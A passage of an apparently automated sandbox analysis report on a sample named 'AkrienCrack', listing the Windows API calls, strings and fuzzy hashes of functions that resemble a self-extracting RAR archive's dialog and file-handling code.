              • GetClientRect.USER32(?,?), ref: 00B4DB85
              • GetWindowLongW.USER32(?,000000F0), ref: 00B4DC25
              • GetWindowRect.USER32(?,?), ref: 00B4DC52
              • SetWindowTextW.USER32(?,?), ref: 00B4DC95
              • GetSystemMetrics.USER32(00000008), ref: 00B4DC9D
              • GetWindow.USER32(?,00000005), ref: 00B4DCA8
              • GetWindowRect.USER32(00000000,?), ref: 00B4DCD5
              • GetWindow.USER32(00000000,00000002), ref: 00B4DD47
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 28f7040f01be47390ca01e15afe3907dbc937a21cac6688651084829f6837f2b
              • Instruction ID: eb70f4db5934590eecf8ce251278372f77ea7a510737630125833d0f1650e6e4
              • Opcode Fuzzy Hash: 28f7040f01be47390ca01e15afe3907dbc937a21cac6688651084829f6837f2b
              • Instruction Fuzzy Hash: FB81A072508301AFD710DF68CD89F6BBBE9EB89704F04496DFA84A3251D670E909CB52
              APIs
              • ___free_lconv_mon.LIBCMT ref: 00B6C277
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE2F
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE41
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE53
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE65
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE77
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE89
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BE9B
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEAD
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEBF
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BED1
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEE3
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BEF5
                • Part of subcall function 00B6BE12: _free.LIBCMT ref: 00B6BF07
              • _free.LIBCMT ref: 00B6C26C
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6C28E
              • _free.LIBCMT ref: 00B6C2A3
              • _free.LIBCMT ref: 00B6C2AE
              • _free.LIBCMT ref: 00B6C2D0
              • _free.LIBCMT ref: 00B6C2E3
              • _free.LIBCMT ref: 00B6C2F1
              • _free.LIBCMT ref: 00B6C2FC
              • _free.LIBCMT ref: 00B6C334
              • _free.LIBCMT ref: 00B6C33B
              • _free.LIBCMT ref: 00B6C358
              • _free.LIBCMT ref: 00B6C370
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 36ef1ceeebe19757128159bf00324d6ff8c81a9af04bc302a7e60047c7e23322
              • Instruction ID: df145535a6c95380aff7ca19325adcc149fec417150635e89e25e0fb955bd09e
              • Opcode Fuzzy Hash: 36ef1ceeebe19757128159bf00324d6ff8c81a9af04bc302a7e60047c7e23322
              • Instruction Fuzzy Hash: 873181326003059FEB209A78D985B67BBEAFF00310F1485A9E499D7651DF39EC40CB64
              APIs
              • GetWindow.USER32(?,00000005), ref: 00B5CD51
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00B5CD7D
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B5CD99
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B5CDB0
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5CDC4
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B5CDED
              • DeleteObject.GDI32(00000000), ref: 00B5CDF4
              • GetWindow.USER32(00000000,00000002), ref: 00B5CDFD
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 3820355801-1882779555
              • Opcode ID: 2fd6014dcd7e8e259ab3be72c8226bd64dc43ab2aa693feb02a4d192c9a7b37d
              • Instruction ID: 44c40a8f5d200d8637fc604ba608ac7fec6c559680be6d16d12e7a4d2d61b04f
              • Opcode Fuzzy Hash: 2fd6014dcd7e8e259ab3be72c8226bd64dc43ab2aa693feb02a4d192c9a7b37d
              • Instruction Fuzzy Hash: F511D532540310BFE6316B649C0BF9F3AEDEB56742F0044E0FE46E60E2CE64890E96A4
              APIs
              • _free.LIBCMT ref: 00B68EC5
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B68ED1
              • _free.LIBCMT ref: 00B68EDC
              • _free.LIBCMT ref: 00B68EE7
              • _free.LIBCMT ref: 00B68EF2
              • _free.LIBCMT ref: 00B68EFD
              • _free.LIBCMT ref: 00B68F08
              • _free.LIBCMT ref: 00B68F13
              • _free.LIBCMT ref: 00B68F1E
              • _free.LIBCMT ref: 00B68F2C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 736b2523e99c3f7d0efe6cc9431038c2cc0e5217b0b110508cf36a882e87d605
              • Instruction ID: 5da987401444a7a1d047398413a3280816c6df11dd21cc51ddb5781aed7b3fdc
              • Opcode Fuzzy Hash: 736b2523e99c3f7d0efe6cc9431038c2cc0e5217b0b110508cf36a882e87d605
              • Instruction Fuzzy Hash: 2B11A47650110DAFDB11EF54C882CDE7BA6FF04350B5182E5BA088B626DE35DA519B80
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: ;%u$x%u$xc%u
              • API String ID: 0-2277559157
              • Opcode ID: 079d329558e9e167ffdb354bacb3f3f718a058842d4c7f407ba2ef55c83374ff
              • Instruction ID: 7c5d43704659c5c31a7d4da0dbf8f3af3a40ec6454baf8d74193867c2821d1d9
              • Opcode Fuzzy Hash: 079d329558e9e167ffdb354bacb3f3f718a058842d4c7f407ba2ef55c83374ff
              • Instruction Fuzzy Hash: ECF123706042405BDB15EF2888D5BFE7BE5AF90700F4844F9FD858B286DB649E48F7A2
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5AD20
              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B5AD47
              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B5AD60
              • SetWindowTextW.USER32(?,?), ref: 00B5AD71
              • GetDlgItem.USER32(?,00000065), ref: 00B5AD7A
              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B5AD8E
              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B5ADA4
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: MessageSend$Item$TextWindow$Dialog
              • String ID: LICENSEDLG
              • API String ID: 3214253823-2177901306
              • Opcode ID: e47db2278e18bfc11098dd20b5cf75b38c784fbb7ec92543678d9fccba3d0612
              • Instruction ID: 9cf1071ca0c3cc863e4e7c3a18f4d562d0e4fd85c009ff49d8f857a5988d87b0
              • Opcode Fuzzy Hash: e47db2278e18bfc11098dd20b5cf75b38c784fbb7ec92543678d9fccba3d0612
              • Instruction Fuzzy Hash: E921A032240204BBD2216F25ED4AF3B3EBCEB4AB47F0101A5FA45A34E1DE629905D632
              APIs
              • __EH_prolog.LIBCMT ref: 00B49448
              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B4946B
              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B4948A
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              • _swprintf.LIBCMT ref: 00B49526
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • MoveFileW.KERNEL32(?,?), ref: 00B49595
              • MoveFileW.KERNEL32(?,?), ref: 00B495D5
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: 5aeb5d39ee06747d63271b732c875dfd8fa84c70fd9fd8d6e7e2e6878e28edb6
              • Instruction ID: 7bcd5ec53f88877af41145d7afdc75c7a471653c6826e15abd709128bdffb6f2
              • Opcode Fuzzy Hash: 5aeb5d39ee06747d63271b732c875dfd8fa84c70fd9fd8d6e7e2e6878e28edb6
              • Instruction Fuzzy Hash: E0414C71900258A6DF20EBA48C85EEF73FCEF55781F0444E5B949E3042EB748B89EB64
              APIs
              • __aulldiv.LIBCMT ref: 00B50A9D
                • Part of subcall function 00B4ACF5: GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B50AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00B50AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B50AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B50B3D
              • __aullrem.LIBCMT ref: 00B50BCB
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: 53b60715a27995b601602953d5f737860e7eed04b7afb502d9e3c5b703f60c8a
              • Instruction ID: d41a0c1c348f4b8a934f03614bf644738bed6b3fe5a04725c9b4f3612bb4911c
              • Opcode Fuzzy Hash: 53b60715a27995b601602953d5f737860e7eed04b7afb502d9e3c5b703f60c8a
              • Instruction Fuzzy Hash: CA4128B14083069FC314DF64C880A6BFBF8FB88715F004E6EF99692650E739E648DB52
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B6F5A2,?,00000000,?,00000000,00000000), ref: 00B6EE6F
              • __fassign.LIBCMT ref: 00B6EEEA
              • __fassign.LIBCMT ref: 00B6EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B6EF2B
              • WriteFile.KERNEL32(?,?,00000000,00B6F5A2,00000000,?,?,?,?,?,?,?,?,?,00B6F5A2,?), ref: 00B6EF4A
              • WriteFile.KERNEL32(?,?,00000001,00B6F5A2,00000000,?,?,?,?,?,?,?,?,?,00B6F5A2,?), ref: 00B6EF83
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 543d1814a22b8dbaf325ea89f63530ab8447db99a5c37389890c6e96c59e6f8f
              • Instruction ID: 4788aa7f31bf1207a254da23f0b89555a916ff4659e61852f89105e0065b500c
              • Opcode Fuzzy Hash: 543d1814a22b8dbaf325ea89f63530ab8447db99a5c37389890c6e96c59e6f8f
              • Instruction Fuzzy Hash: 1051D474A002099FDB10CFA8DC85BEEBBF9EF09710F14459AE965E7291D734E940CB60
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 00B5C54A
              • _swprintf.LIBCMT ref: 00B5C57E
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • SetDlgItemTextW.USER32(?,00000066,00B8946A), ref: 00B5C59E
              • _wcschr.LIBVCRUNTIME ref: 00B5C5D1
              • EndDialog.USER32(?,00000001), ref: 00B5C6B2
              Strings
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: ffc47a2f5dd5ca841eabde341ce5396e5f80ca37b8672af2862c41306a6f0af4
              • Instruction ID: aefea74a9fd3a7aa68b7d6afb8dae7df92b530e534ead1827de4c6908b793fa7
              • Opcode Fuzzy Hash: ffc47a2f5dd5ca841eabde341ce5396e5f80ca37b8672af2862c41306a6f0af4
              • Instruction Fuzzy Hash: D7416471900618AAEF26DB90DC45FEA7BFDEB04706F0440E6E909E7161EB719BC8CB50
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00B58F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B58F59
              Strings
              Similarity
              • API ID: AllocByteCharGlobalMultiWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 3286310052-4209811716
              • Opcode ID: a0d644411c628b1a62dab8837fd369f8b7dfa39b78678499b0644dcbd07db642
              • Instruction ID: f1f447f23014c31865a2bd3d4b6a2bb7bfa0f42862484ceeb572f70230e7a21a
              • Opcode Fuzzy Hash: a0d644411c628b1a62dab8837fd369f8b7dfa39b78678499b0644dcbd07db642
              • Instruction Fuzzy Hash: 36313731548311ABD720AB249C06F6F77E8DF56722F0444DAFC16B71D1EF689A4D83A1
              APIs
              • ShowWindow.USER32(?,00000000), ref: 00B5964E
              • GetWindowRect.USER32(?,00000000), ref: 00B59693
              • ShowWindow.USER32(?,00000005,00000000), ref: 00B5972A
              • SetWindowTextW.USER32(?,00000000), ref: 00B59732
              • ShowWindow.USER32(00000000,00000005), ref: 00B59748
              Strings
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: c6984186a4cbd1f0ae30b16e7384dcd2a99874585d0932072f28115e1a18d3f4
              • Instruction ID: 89ffce257d7183fab39993b8ffb65bd5a1e16a97103db2d7a943e63495a80b5e
              • Opcode Fuzzy Hash: c6984186a4cbd1f0ae30b16e7384dcd2a99874585d0932072f28115e1a18d3f4
              • Instruction Fuzzy Hash: 0031C131004200EFCB119F68DC8AB6B7BE8EF49702F0445DAFE49AA162DB34D949CB61
              APIs
                • Part of subcall function 00B6BF79: _free.LIBCMT ref: 00B6BFA2
              • _free.LIBCMT ref: 00B6C003
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6C00E
              • _free.LIBCMT ref: 00B6C019
              • _free.LIBCMT ref: 00B6C06D
              • _free.LIBCMT ref: 00B6C078
              • _free.LIBCMT ref: 00B6C083
              • _free.LIBCMT ref: 00B6C08E
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: eb029a3982930614de1742f9d3688c46bb1d164038d69b5c9ac74c88dd22e9d6
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 80111271541B04F6E620BBB0DC47FCBB7ED6F04700F4089A5B299A6563DF6DF9448A90
              APIs
              • GetLastError.KERNEL32(?,?,00B620C1,00B5FB12), ref: 00B620D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B620E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B620FF
              • SetLastError.KERNEL32(00000000,?,00B620C1,00B5FB12), ref: 00B62151
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 2e68190555481fab7212b960a5a2d8218381f691bbfe906ecd614ae1e9090b00
              • Instruction ID: 3c1788a7a562ab034bf613449cb7e025b1529cadb7000f7265d7a10f6e30a714
              • Opcode Fuzzy Hash: 2e68190555481fab7212b960a5a2d8218381f691bbfe906ecd614ae1e9090b00
              • Instruction Fuzzy Hash: 1601FC3310DB116EB7543BB5FC855162BC4EF16B7872107E9F224761E1EF19CC419144
              Strings
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: b03499b34b2f64c32aa4c99537e32c6e4db91e2c5cde22d21f427f01203676ae
              • Instruction ID: 2a6ab117955f4361b2d6d51006b684618c62fdb4b22f310ce3af22a624c8ed35
              • Opcode Fuzzy Hash: b03499b34b2f64c32aa4c99537e32c6e4db91e2c5cde22d21f427f01203676ae
              • Instruction Fuzzy Hash: 730128316513226B4F306FB45C853E623E4EA4272372047FAED55E3350FE91C8C9E6A0
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50D0D
                • Part of subcall function 00B4ACF5: GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00B50CB8), ref: 00B50D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B50D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B50D56
              • SystemTimeToFileTime.KERNEL32(?,00B50CB8), ref: 00B50D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50D72
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: 565c360b3c7fb448abc7e832f0ff5112c6d9ce6321489f632e2715157db9ff89
              • Instruction ID: 5bb8f61a39594f69b5d313c08e866aefaeaa92e8a63f1e336fcf3e166ed7b089
              • Opcode Fuzzy Hash: 565c360b3c7fb448abc7e832f0ff5112c6d9ce6321489f632e2715157db9ff89
              • Instruction Fuzzy Hash: FA31C97990020AEBCB00DFE5D8859EFBBF8FF58701B04456AE955E3610EB309685CB65
              APIs
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: c503ed5b1ac65140cccd534a17e3ebd366da26162d4e01f1758719ae65253519
              • Instruction ID: 024e134bffb03c5c057059015d4780e888ad410571cb17af118fbef2121a2a88
              • Opcode Fuzzy Hash: c503ed5b1ac65140cccd534a17e3ebd366da26162d4e01f1758719ae65253519
              • Instruction Fuzzy Hash: 8B217C7160420EFBD714AB10CC81F7AB7EDEB50786F10C1E8FC0E9A252E665ED499691
              APIs
              • GetLastError.KERNEL32(?,00B80EE8,00B63E14,00B80EE8,?,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B68FA9
              • _free.LIBCMT ref: 00B68FDC
              • _free.LIBCMT ref: 00B69004
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B69011
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B6901D
              • _abort.LIBCMT ref: 00B69023
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 5149cf29d319a6bab0e7e1ad4e49b4589d6f3dbeced443424e4ee542e4a62270
              • Instruction ID: 9028e98c6588d163f775b91ebb2aeea97115be4e05adf9ed9f14062d4a8cece1
              • Opcode Fuzzy Hash: 5149cf29d319a6bab0e7e1ad4e49b4589d6f3dbeced443424e4ee542e4a62270
              • Instruction Fuzzy Hash: 82F028355096106AC62233686C4AB2B29EADFD1760F2406E4F519E32A2EE2CCD416021
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B5D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D31D
              • TranslateMessage.USER32(?), ref: 00B5D327
              • DispatchMessageW.USER32(?), ref: 00B5D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B5D33C
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: b4641f36f9b6e61a8794d9c6fe1ca2b22f8903d0c69bfe13231ee535e8fccea0
              • Instruction ID: 112b6c44c323d1e1f0815f91504a5221d88909c87e8e918f54fbf1d835e7f8a2
              • Opcode Fuzzy Hash: b4641f36f9b6e61a8794d9c6fe1ca2b22f8903d0c69bfe13231ee535e8fccea0
              • Instruction Fuzzy Hash: F8F03C72A01129ABCB306BA5DC4DEDBBFADEF52792F008152FA06D3010DA348545C7A1
              APIs
              • _wcschr.LIBVCRUNTIME ref: 00B5C435
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              Strings
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: cfc4e206425b1e866eb895daf7581005a978a9a57414e220c44f7542d0605546
              • Instruction ID: 376fb1e6dbf6b8efcd939ef134d96173a44c4e3fab315e14a1728ba0b3899619
              • Opcode Fuzzy Hash: cfc4e206425b1e866eb895daf7581005a978a9a57414e220c44f7542d0605546
              • Instruction Fuzzy Hash: F8318476900309AEDF21DA54CC51FEA7BFDEB14305F0044E6FD19A6151EBB09EC88A50
              APIs
              • LoadBitmapW.USER32(00000065), ref: 00B5ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5AE22
              • DeleteObject.GDI32(00000000), ref: 00B5AE54
              • DeleteObject.GDI32(00000000), ref: 00B5AE77
                • Part of subcall function 00B59E1C: FindResourceW.KERNEL32(00B5AE4D,PNG,?,?,?,00B5AE4D,00000066), ref: 00B59E2E
                • Part of subcall function 00B59E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E46
                • Part of subcall function 00B59E1C: LoadResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E59
